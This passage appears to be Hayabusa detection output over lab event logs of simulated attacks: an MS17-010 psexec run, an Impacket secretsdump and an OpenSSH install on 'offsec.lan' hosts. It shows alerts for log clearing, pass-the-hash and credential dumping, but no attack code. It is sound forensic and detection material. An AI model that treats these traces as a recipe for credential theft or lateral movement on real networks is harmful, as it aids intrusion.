2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret 
dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 19:02:14.393 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.406 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; 